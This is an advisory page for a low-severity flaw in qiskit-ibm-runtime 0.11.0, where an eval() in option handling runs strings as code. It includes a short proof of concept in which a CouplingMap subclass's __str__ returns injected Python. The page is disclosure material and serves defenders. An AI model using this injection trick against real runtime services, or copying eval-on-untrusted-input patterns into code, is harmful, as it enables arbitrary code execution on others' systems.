Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS1jcTk2LTk5NzQtdjhobc4AA6LE

Dynamic Variable Evaluation in qiskit-ibm-runtime

Summary

An eval() method exists Options._get_program_inputs. This is bad in any case, but especially bad because Options are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.

Details

https://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140

PoC

A local exploit would be something like

from qiskit import transpiler

class BadActor(transpiler.CouplingMap):
    def __str__(self):
        return "print('external code')"

Where print("external code") can be any arbitrary python code string.

Then if you did a normal workflow and used a specifically constructed CouplingMap subclass like BadActor above:

from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler
from qiskit import QuantumCircuit

cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
options.simulator = dict(coupling_map=cmap))

bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()

with Session(service=service, backend="ibmq_qasm_simulator") as session:
    sampler = Sampler(session=session, options=options).run(bell)

This will print external code

Impact

Security vulnerability.

Permalink: https://github.com/advisories/GHSA-cq96-9974-v8hm
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jcTk2LTk5NzQtdjhobc4AA6LE
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Low
Classification: General
Published: about 1 month ago
Updated: about 1 month ago


CVSS Score: 2.8
CVSS vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N

Identifiers: GHSA-cq96-9974-v8hm
References: Repository: https://github.com/Qiskit/qiskit-ibm-runtime
Blast Radius: 3.1

Affected Packages

pypi:qiskit-ibm-runtime
Dependent packages: 11
Dependent repositories: 13
Downloads: 133,324 last month
Affected Version Ranges: >= 0.11.0, < 0.11.1
Fixed in: 0.11.1
All affected versions: 0.11.0
All unaffected versions: 0.1.0, 0.1.1, 0.2.0, 0.3.0, 0.4.0, 0.5.0, 0.6.0, 0.6.1, 0.6.2, 0.7.0, 0.8.0, 0.9.0, 0.9.1, 0.9.2, 0.9.3, 0.9.4, 0.10.0, 0.11.1, 0.11.2, 0.11.3, 0.12.0, 0.12.1, 0.12.2, 0.13.0, 0.14.0, 0.15.0, 0.15.1, 0.16.0, 0.16.1, 0.17.0, 0.18.0, 0.19.0, 0.19.1, 0.20.0, 0.21.0, 0.21.1, 0.21.2, 0.22.0, 0.23.0